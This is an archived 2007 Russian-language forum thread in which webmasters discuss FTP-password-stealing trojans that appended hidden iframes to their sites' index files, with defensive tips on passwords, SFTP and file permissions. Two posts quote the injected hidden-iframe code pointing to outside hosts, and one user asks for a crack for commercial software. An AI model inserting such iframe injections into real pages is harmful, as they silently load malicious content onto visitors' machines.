Форум SAPE.RU

Форум SAPE.RU (http://forum.sape.ru/index.php)
-   Вопросы по работе системы (http://forum.sape.ru/forumdisplay.php?f=13)
-   -   Справка по антивирусному обеспечению (http://forum.sape.ru/showthread.php?t=2958)

mysql 07.07.2007 13:07

Справка по антивирусному обеспечению
 
Доброго времени!

Имею ряд сайтов, подключенных к всеми уважаемой системе SAPE.
Но 2 дня назад обнаружил интересную вещь: почти на всех этих сайтах в конец файлов index.html, index.htm, index.php (где что есть) кем-то был добавлен следующий код после тэга </HTML>:
Код:

<iframe src="http://autobazar.kz/ini.php" width=1 height=1></iframe><iframe src="http://autobazar.kz/ini.php" width=1 height=1></iframe>
Соответственно, при заходе на страницы сайтов это код прокачивает партнерки гугла, бегуна и т.п...
Есть серьезное подозрение, что в скрипте sape.php есть уязвимость, позволяющая модифицировать файлы на сайтах, где он расположен.
Ни у кого больше нет таких проблем?

Wink 07.07.2007 13:18

Вы подцепили трояна, который увел ваши пароли FTP. Сейчас такое часто бывает. Меняйте пароли, проверяйте комп, очищайте код сайта.
Sape здесь непричем

ABSolut 07.07.2007 13:25

+1 Давненько этот троян бродит.

mysql 07.07.2007 13:32

Спасибо за ответы. Никто не подскажет, что это за троян? Хостинг сайтов на линуксе и не совсем понятно как его почистить. И почему тогда взломали только сайты, подключенные к sape, хотя есть и ряд других?

Wink 07.07.2007 13:48

А причем тут хостинг сайтов? Вы сами то под линуксом сидите или как? А в Total Commander или каком другом менеджере пароли к некоторым сайтам не забиты были? :) Разновидностей такого трояна много, все по разному себя проявляют.

mysql 07.07.2007 13:52

Я сижу под виндой. Есть антивирус, фаервол, проверялка троянов - все со свежими базами и ни одна программа ничего не показывает. Вот поэтому и озадачился. В Total Commander пароли забиты - это факт.

coguar 07.07.2007 14:04

2автор: у меня после </html> стоит только <!-- Use compress gzip -->

:))))
Ищи проблему у себя.

Здравая а может и больная логика подсказывает мне, что если бы было так как сказали ВЫ, то тот кто нашел бы способ изменять файлы через сапу - смог бы найти способ изменить это на ВСЕХ сайтах, а не только у Вас.

ABSolut 07.07.2007 15:03

Цитата:

Сообщение от mysql (Сообщение 24197)
Я сижу под виндой. Есть антивирус, фаервол, проверялка троянов - все со свежими базами и ни одна программа ничего не показывает. Вот поэтому и озадачился. В Total Commander пароли забиты - это факт.

Через ТС и пролезает.
Могу привести цитату с моего хостинга:
Цитата:

Уважаемые клиенты! В связи с активизацией вирусов, похищающих пароли от ftp-аккаунтов, просим вас внимательнее относится к хранению ваших паролей. По возможности, не сохраняйте пароли в ftp-клиентах, вирусы пытаются достать информацию из конфигурации ftp-клиентов. Пользуйтесь антивирусами и firewall'ами.

Так же, старайтесь использовать длиные, "сложные" пароли, состоящие из цифр, строчных и заглавных букв. Хорошая практика - регулярная смена паролей.
Вобщем, меняйте все пароли, перезаливайте index на сайты

V!rus 07.07.2007 16:04

блин, из ТС нада парольки убрать, хотя каспер все время работает.. мало ли что.
ЗЫЖ 2автор, повезло, не так уж и страшно. Троян вообще мог убить все файлы ;)

DeKKO 07.07.2007 17:16

Мне тоже какой-то "доброжелатель" вкатил сегодня
Код HTML:

<iframe src="http://adventureboats.co.nz/skunk/images/index.htm" scrolling="no" frameborder="0" width=0 height=0></iframe>
Смотрите так:
если присадка тупо дописана во все индексы, то меняйте пароль FTP;
если как-то "по-уму" - дыра в движке.

И, я так понял, что такие изделия проиндексируются, как дополнительные внешние сылки.

wsdotcom 07.07.2007 17:32

эксплоит
 
у меня на хостера эксплоит напал делал редирект со всех сайтов на директорию с файлами flame.so и flame.php и еще какой-то мусор... проблему решили, какой-то клиент занес эту хрень на сервак, но ерроров после этого была целая куча........


А теперь сам вопрос.... какие есть нормальные программы для выявления этих эксплоитов и троянов которые фтп пароли воруют и индексы херят???

ЗЫ: нод вообще пропускает троянов, дрвеб что-то обнаружил но всеравно на следующий день родного индекса ни одного не оказалось... а аутпост кроме вход и исход соединений ничего не контролит:(

DeKKO 07.07.2007 17:41

Цитата:

Сообщение от wsdotcom (Сообщение 24249)
...а аутпост кроме вход и исход соединений ничего не контролит:(

Ну так Вы и смотрите, кто с кем соединяется, и анализируйте, нормально это или нет.
К примеру, если соединяется какой-нить gkjefgj.exe, то это не есть хорошо:)

wsdotcom 07.07.2007 17:50

логично:)
но это же нужно открывать и смотреть, а мне нужно узнать какие проги есть кроме дрвеб для вычисления троянов в процессе работы автоматом... в дрвебе этим занимается спайдерНТ

Wink 07.07.2007 18:01

Я вместе с аутпостом и касперским поставил на firefox расширение NoScript, которое блокирует все javascript до тех пор, пока явно не разрешишь для сайта его использование. От случайных связей предохраняет. Вот тут можно взять: noscript.net

Lesnik59 07.07.2007 18:13

Цитата:

Сообщение от wsdotcom (Сообщение 24249)
у меня на хостера эксплоит напал делал редирект со всех сайтов на директорию с файлами flame.so и flame.php и еще какой-то мусор... проблему решили, какой-то клиент занес эту хрень на сервак, но ерроров после этого была целая куча........


А теперь сам вопрос.... какие есть нормальные программы для выявления этих эксплоитов и троянов которые фтп пароли воруют и индексы херят???

ЗЫ: нод вообще пропускает троянов, дрвеб что-то обнаружил но всеравно на следующий день родного индекса ни одного не оказалось... а аутпост кроме вход и исход соединений ничего не контролит:(

Не хочу заниматься рекламой, но вот такая ситуэйшин. На машине стоял НОД, Firewall. Все лицензионное, другим не пользуюс. И вдруг в одно прекрасное утро - взломаны 3 моих интернет-магазина, попытка снятия маней с webmoney и т.д. Предпринял действие, заблокировал по звонку все финансовые кошельки и т.д. И начал поиск. НОД нифига (пардон) не нашел, попробывал каспером, та же ситуация. И мне порекомендовал один из юзеров WM поставит антивирусник AGV. Поставил. Блиныч, 5 троянов. Названия уже не помню. Вот теперь доверяю только AGV. Не реклама!!!

DeKKO 07.07.2007 18:25

ИМХО лучший антивирус - это сам юзер.
А пытаться найти "лучший антивирь" - безнадёжное дело, одни ловят одно и пропускают другое, другие - наоборот...

ЗЫ: 2moderators: Тему надо преобразовать в "Справку по антивирусному обеспечению" и как-то выделить, думаю, для многих это будет полезным.

Lesnik59 07.07.2007 18:40

Цитата:

Сообщение от DeKKO (Сообщение 24273)
ИМХО лучший антивирус - это сам юзер.
А пытаться найти "лучший антивирь" - безнадёжное дело, одни ловят одно и пропускают другое, другие - наоборот...

ЗЫ: 2moderators: Тему надо преобразовать в "Справку по антивирусному обеспечению" и как-то выделить, думаю, для многих это будет полезным.

+ 1 согласен тема нужна. Но искать все таки нужно для себя приемлемый. Я просто сделал свой вывод и только для себя

mysql 07.07.2007 21:58

Похоже, что на самом деле какой-то троян стырил пароли ко всем сайтам, которые были забиты в TC. Но в системе я его так и не нашел, хотя много чем и где искал. Сейчас меняю пароли и перезаливаю индексы. И другие меры заодно принимаю. Всем спасибо за помощь.

wsdotcom 08.07.2007 00:27

так и есть
 
Цитата:

Сообщение от mysql (Сообщение 24347)
Похоже, что на самом деле какой-то троян стырил пароли ко всем сайтам, которые были забиты в TC. Но в системе я его так и не нашел, хотя много чем и где искал. Сейчас меняю пароли и перезаливаю индексы. И другие меры заодно принимаю. Всем спасибо за помощь.

так и есть троян

saker 08.07.2007 00:58

Цитата:

Сообщение от DeKKO (Сообщение 24273)
ИМХО лучший антивирус - это сам юзер.
А пытаться найти "лучший антивирь" - безнадёжное дело, одни ловят одно и пропускают другое, другие - наоборот...

ЗЫ: 2moderators: Тему надо преобразовать в "Справку по антивирусному обеспечению" и как-то выделить, думаю, для многих это будет полезным.

Когда приходится гонять сайты по каталогам, а их по 1500 тысячи, и есть каталоги которые специально заточены под рассылку троянов. Есть какой-нибудь менеджер, который бы хранил пароли к ФТП в зашифрованном виде?

Ank 08.07.2007 11:10

Бедные пользователи виндов... Зато как жить им интересно :)

mysql 08.07.2007 13:39

Цитата:

Сообщение от saker (Сообщение 24406)
Есть какой-нибудь менеджер, который бы хранил пароли к ФТП в зашифрованном виде?

Они все хранят в зашифрованном виде, в том числе и TC. Другое дело, что метод шифрования там слабый. Поэтому вопрос стоит так - какой файловый менеджер хранит пароли надежно зашифрованными и поддерживает SFTP?

DeKKO 08.07.2007 13:49

Цитата:

Сообщение от saker (Сообщение 24406)
Когда приходится гонять сайты по каталогам, а их по 1500 тысячи, и есть каталоги которые специально заточены под рассылку троянов. Есть какой-нибудь менеджер, который бы хранил пароли к ФТП в зашифрованном виде?

Цитата:

Сообщение от mysql (Сообщение 24511)
Они все хранят в зашифрованном виде, в том числе и TC. Другое дело, что метод шифрования там слабый. Поэтому вопрос стоит так - какой файловый менеджер хранит пароли надежно зашифрованными и поддерживает SFTP?

Все эти "зашифрованные виды" бесполезны,- если известно какой фтп-клиент, соответственно, понятен алгоритм шифрования.
В какой-то степени можно надеяться только на файрволл, имхо.
И почаще менять пароль, особенно, после таких "прогонов".:)

Дмитрий Сергеевич 09.07.2007 19:50

Подобные трояны инфицируют по ftp в первую очередь файлы index.*
Поэтому советую в первую очередь установить атрибуты "444" на файлы index.* - в этом случае троян не сможет ничего вписать в такие файлы...

9dVSnVN6 09.07.2007 20:54

Цитата:

Сообщение от Ank (Сообщение 24465)
Бедные пользователи виндов... Зато как жить им интересно :)

:D :D :D

mysql: вот как то давным давно на руборде присоветовал мне народ софтину http://www.anypassword.com простая версия бесплатна, файл с пассами шифрован с мастерпаролем. Все удобно и генератор пассов есть. Пользуюсь уже давно, прога просто спасение, паролей у меня сотни и не нужно ни в каких программах их сохранять, никогда, принципиально. И пароли все по 16 символов, брутфорсом - ломай не хочу.

m_a_f 09.07.2007 23:00

http://www.viruslist.com/ru/viruses/...virusid=147349
Тут описание этого трояна (не обязательно этого -но из их "семейства").

А тут ветка на МТ по этому поводу:
http://mastertalk.ru/topic23516.html

mysql 10.07.2007 12:35

Цитата:

Сообщение от 9dVSnVN6 (Сообщение 24909)
mysql: вот как то давным давно на руборде присоветовал мне народ софтину http://www.anypassword.com простая версия бесплатна, файл с пассами шифрован с мастерпаролем.

Спасибо за информацию. Прога очень хорошая, особенно, версия Pro. Ни у кого нет к ней лекарства (если есть, буду благодарен письму в личку)?

DeKKO 13.07.2007 16:26

Вот ещё менеджеры паролей:
http://www.ammosoft.com/rus/
http://olegprojects.narod.ru/downloads/PassKeeper.html

vlav 03.09.2007 22:28

Бедные виндузятники!
Да бросайте вы это занятие - борьба со следствием всего лишь.
Нет - это прикол - тырить пароли с клиентских машин вебмастеров! Да еще так успешно.

muxa 03.09.2007 22:54

Цитата:

Сообщение от vlav (Сообщение 38373)
Бедные виндузятники!
Да бросайте вы это занятие - борьба со следствием всего лишь.

А мы не боремся, мы ждём когда линуксоиды затащат в свои ряды побольше юзверей (хотя не верю я в это, ой не верю).

И как только куча чайников влезел в линукса, часть кулхацкеров переключится на эту аудиторию.

И нам, бедным виндусятникам, станет полегче :)

sova 04.09.2007 10:33

ЗЫ по поводу ftp клиентов, ломают не шифрование паролей в записной книжке или самом клиенте, а снимают пароль в чистом виде на стадии подключения к серверу
Пароль идет в открытом виде
Поэтому если у вас есть доступ к каталогу сайта по ssh то надо использовать его и scp (secure copy).

товарисч 04.09.2007 10:36

для этого надо сидеть на канале между клиентом и сервером.
Если клиент не по WiFi нешифрованному сидит - то такое возможно только провайдером.
а там другая грабля - на инетрфейсе нереально много пакетов... заколебёшься внужные искать.
хотя - всё автоматизируется

sova 04.09.2007 10:41

Цитата:

Сообщение от товарисч (Сообщение 38455)
для этого надо сидеть на канале между клиентом и сервером.
Если клиент не по WiFi нешифрованному сидит - то такое возможно только провайдером.
а там другая грабля - на инетрфейсе нереально много пакетов... заколебёшься внужные искать.
хотя - всё автоматизируется


Так троян и будет прокладкой между тобой и сервером в одной сети
Я говорю что нафиг заморачиваться с расшифровками всякими если пароль и так идет открытым видом =)

Зы
если кому интересно почитайте тут как использовать ssh
http://sova.unica.by/doc/ssh/
вопросы будут задавайте

seocore 04.09.2007 11:53

Цитата:

Сообщение от sova (Сообщение 38453)
ЗЫ по поводу ftp клиентов, ломают не шифрование паролей в записной книжке или самом клиенте, а снимают пароль в чистом виде на стадии подключения к серверу
Пароль идет в открытом виде
Поэтому если у вас есть доступ к каталогу сайта по ssh то надо использовать его и scp (secure copy).

что вы паритесь, смех один:
1) троян просто достает пароли из .ini файла Total Commander'а в корне винды
2) кроме этого троян берет пароли аськи и все что в компе есть, включая даже менеджеры паролей FF и Оперы

поймите если пароль где-то записан в компе - то это уже не секьюрно по той причине - что профи просто проанализировав механизм работы менеджера паролей той или иной программы - довольно быстро напишут механизм декодирования этих паролей

по поводу троянов, вирусов и т.п. - Линух, БЗДя и прочие nix'ы такая же хорошая среда для них, просто в виду своей непопулярности в народе эту среду не облюбовали вирусо-трояно писатели ...

кстати - рекурсивно удалить файлы на всем диске можно в линухе, более того можно тупо устроить рекурсивно chmod на / с соответствующими правами, чтобы уложить всю машину...

по поводу дыр - так их полно в линухе, буквально каждую неделю открывают новую дыру которая позволяет простому юзеру получить рутовые права, так что по поводу безопасности не надо грузить народ :)

Ank 04.09.2007 14:33

Так. В курилку - оба.

Veles 05.09.2007 10:27

Цитата:

Сообщение от mysql (Сообщение 24186)
Доброго времени!

Имею ряд сайтов, подключенных к всеми уважаемой системе SAPE.
Но 2 дня назад обнаружил интересную вещь: почти на всех этих сайтах в конец файлов index.html, index.htm, index.php (где что есть) кем-то был добавлен следующий код после тэга </HTML>:
Код:

<iframe src="http://autobazar.kz/ini.php" width=1 height=1></iframe><iframe src="http://autobazar.kz/ini.php" width=1 height=1></iframe>
Соответственно, при заходе на страницы сайтов это код прокачивает партнерки гугла, бегуна и т.п...

Для профилактики можно поставить на страницах сразу (без пробелов) после тега </html>

<noindex><a href="http://etosaglushkaprotivtrojanov.com/" rel="nofollow">этозаглушкапротиврекламныхтроянов

Без закрывающего тега </a>. И любые <!-- 0123456789 --> сами себя закроют. А Яндекс <noindex> без закрышки исполняет.

Или какой-нибудь скрипт, типа
<SCRIPT LANGUAGE="JavaScript">
<!-- Begin
web = "http://www";
site = "etosaglushkaprotivtrojanov.com";
document.write('<a target=_blank href=\"' + web + '.' + site + '\">');
document.write(web + '.' + site + '</a>');

бла-бла-бла

// End --></SCRIPT>

Троян в него должен ввалиться.
Да, много чего можно придумать, чтобы каждый день индексы не шерстить.

maxispeed 13.09.2007 22:19

Если админы не сочтут рекламой.....
про лечение и защиту от вирусов хорошо могут объяснить тут www.virusinfo.info я уже раза 3 к ним попадал (последний раз вчера из за описаного мной в теме Вирусы вирусы)

К админам: сорри если здесь это считается рекламой.

sergun4ik 28.10.2007 20:02

когда меня посетила сея беда, на форуме одном непомню каком нашел запись что наехали на одного чела что я кобы он давал объявы что продает ифрейм для загрузки.

(50баков за 1000 чтоли)

вобщем бало на этом рубят
и пока будут бабло платить за загрузку на ничегонеподозревающего пк юзера будут такие трояны и будут у нас проблемы.

и кода фтп все перекроют и не будут пароли капать на их мыло то
кодеры будут массово переходить на популярные движки и вставлять свой злой код прямо в дырку вашего двига и при этом не воруя у нас ни чего.

windtalker 28.10.2007 23:13

эмм .... а как же Linux ? имхо панацея ...

muxa 28.10.2007 23:17

Цитата:

Сообщение от windtalker (Сообщение 52294)
эмм .... а как же Linux ? имхо панацея ...

ага, есть у меня знакомый пингвиноид

от него давеча по аське пришла просьба послать СМС на короткий номер типа что-то получитьв ответ и пересдать ему.

вы уж прсотите несчастного маздайщика, но не верю я такие чудеса.

сразу позвонил по телефоне, а он такой грустный... аську видители спёрли.

такая вот поучительная история :)


Часовой пояс GMT +3, время: 23:49.

Работает на vBulletin® версия 3.8.7.
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
Перевод: zCarot
SAPE.RU — система купли-продажи ссылок с главных и внутренних страниц сайтов.